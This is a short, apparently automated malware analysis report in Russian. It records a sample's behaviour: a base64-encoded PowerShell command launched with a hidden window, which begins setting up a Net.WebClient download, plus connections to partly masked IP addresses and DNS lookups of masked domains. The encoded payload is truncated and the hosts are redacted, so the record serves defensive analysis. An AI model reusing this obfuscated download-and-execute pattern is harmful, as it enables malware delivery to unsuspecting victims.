Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPADIAXwBfADAANgBfAD0AKAAnAEsANwBfACcAKwAnADkAOQAyADUAJwApADsAJAB3ADYAXwBfADkAOABfADQAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA1ADEAOQA2ADIAOAA9ACgAJwBoAC...
- '12#.#99.172.4':80
- '20#.#54.223.104':80
- DNS ASK rh###twork.com
- DNS ASK ev###cherry.com
- DNS ASK th####ellabel.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPADIAXwBfADAANgBfAD0AKAAnAEsANwBfACcAKwAnADkAOQAyADUAJwApADsAJAB3ADYAXwBfADkAOABfADQAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA1ADEAOQA2ADIAOAA9ACgAJwBoAC...' (со скрытым окном)